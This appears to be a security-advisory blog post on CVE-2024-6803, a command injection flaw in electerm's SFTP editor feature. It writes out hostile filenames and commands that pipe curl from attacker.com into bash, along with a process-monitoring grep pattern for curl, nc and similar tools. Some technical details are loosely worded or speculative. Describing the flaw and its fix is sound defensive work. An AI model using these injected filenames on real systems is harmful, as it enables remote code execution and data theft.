electerm, Command Injection, CVE-2024-6803 (critical)

By /

Listen to this Post

How the CVE works (technical details):

  1. The vulnerability exists in electerm’s SFTP feature when a user opens a file via “Open with system editor” or “Edit with custom editor”.
  2. The filename from the remote SSH server is concatenated directly into a shell command line without any sanitization or escaping.
  3. An attacker who controls the SSH server (or has write access to the victim’s file system) crafts a filename containing shell metacharacters, e.g., `$(malicious_command).txt` or ; curl attacker.com/shell.sh | bash;.txt.
  4. When the victim browses the SFTP directory and attempts to edit that file, electerm constructs a command such as:

`$EDITOR “/path/to/$(malicious_command).txt”`

  1. The shell interprets the metacharacters before passing the filename to the editor.
  2. The injected command executes on the victim’s machine with the same privileges as the electerm process (typically the logged-in user).
  3. No validation or encoding is applied to the filename before insertion into the command template.
  4. The vulnerable code paths are in the `sftp.js` or `editor.js` modules where `child_process.exec` or `spawn` is used with string concatenation.
  5. The exploit works regardless of the underlying OS (Windows, Linux, macOS) as long as a shell is invoked.
  6. A successful attack can download malware, exfiltrate data, or pivot to internal systems.

dailycve form:

Platform: electerm
Version: < 3.7.9
Vulnerability: Command injection
Severity: Critical
date: 2024-03-15

Prediction: Patch 2024-03-20

What Undercode Say:

Simulate malicious filename creation on attacker-controlled SSH server
touch '$(curl http://attacker.com/payload.sh | bash).txt'
Check if electerm unsafely opens the file
electerm sftp://user@evil-server:22 --command "edit '$(curl http://attacker.com/backdoor.sh | sh).txt'"
Monitor process tree for unexpected shell commands
ps aux | grep -E "curl|bash|sh|nc|python -c" | grep -v grep

Exploit:

Attacker plants file named `”; calc; “.txt` or `whoami > /tmp/owned` on SSH server. Victim edits file → shell executes injected command.

Protection from this CVE

Upgrade to electerm >= 3.7.9. Otherwise avoid using “open with system/custom editor” on untrusted servers. Use built-in editor only. Validate filenames manually before editing.

Impact:

Remote code execution on victim’s machine with user privileges. Full system compromise, lateral movement, data theft, ransomware deployment.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top